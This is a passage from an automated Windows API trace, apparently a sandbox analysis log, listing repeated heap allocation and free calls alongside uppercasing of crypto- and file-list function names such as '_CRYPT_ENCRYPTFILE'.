(HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e746f8 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c38 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f020 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e868 [0121.912] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0121.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e746f8 | out: hHeap=0x970000) returned 1 [0121.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efe0 | out: hHeap=0x970000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f050 [0121.914] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0121.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f050 | out: hHeap=0x970000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f030 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0121.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79248 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0121.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e750 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977e48 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f040 [0121.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e948 [0121.915] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79248 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0a0 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e750 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f030 | out: hHeap=0x970000) returned 1 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0121.915] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0a0 | out: hHeap=0x970000) returned 1 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f050 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efe0 [0121.915] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e8d8 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779c8 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.915] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efb0 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e5c8 [0121.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efe0 | out: hHeap=0x970000) returned 1 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e8d8 | out: hHeap=0x970000) returned 1 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f050 | out: hHeap=0x970000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e520 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.916] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e520 | out: hHeap=0x970000) returned 1 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efd0 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e750 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977878 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f030 [0121.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e7c0 [0121.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efd0 | out: hHeap=0x970000) returned 1 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e750 | out: hHeap=0x970000) returned 1 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0121.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f050 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e520 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977968 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef50 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e750 [0121.917] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0121.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f050 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e520 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0a0 | out: hHeap=0x970000) returned 1 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e8d8 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0121.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e8d8 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f050 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efd0 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e600 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977d58 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef60 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e8d8 [0121.918] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efd0 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e600 | out: hHeap=0x970000) returned 1 [0121.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f050 | out: hHeap=0x970000) returned 1 [0121.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0d0 [0121.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0d0 | out: hHeap=0x970000) returned 1 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efe0 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79248 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977d28 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f130 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4e8 [0121.919] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79248 | out: hHeap=0x970000) returned 1 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efe0 | out: hHeap=0x970000) returned 1 [0121.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e791d0 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f050 [0121.920] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e791d0 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f050 | out: hHeap=0x970000) returned 1 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efd0 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0e0 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977d88 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0d0 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78f50 [0121.920] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0e0 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78d98 | out: hHeap=0x970000) returned 1 [0121.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efd0 | out: hHeap=0x970000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7efd0 [0121.921] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0121.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0121.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7efd0 | out: hHeap=0x970000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0b0 [0121.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e78d98 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ba8 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f050 [0121.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0121.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e910 [0121.921] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78d98 | out: hHeap=0x970000) returned 1 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0b0 | out: hHeap=0x970000) returned 1 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7ef80 [0121.922] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e4b0 | out: hHeap=0x970000) returned 1 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ef80 | out: hHeap=0x970000) returned 1 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f060 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e766f0 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f0a0 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76720 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76600 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76630 [0121.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76660 [0121.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e6a8 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a88 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e76588 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e7f140 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76588 | out: hHeap=0x970000) returned 1 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e4b0 [0121.923] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e766f0 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f0a0 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76600 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76630 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76660 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e76720 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e6a8 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f060 | out: hHeap=0x970000) returned 1 [0121.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e638 | out: hHeap=0x970000) returned 1 [0121.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0121.923] 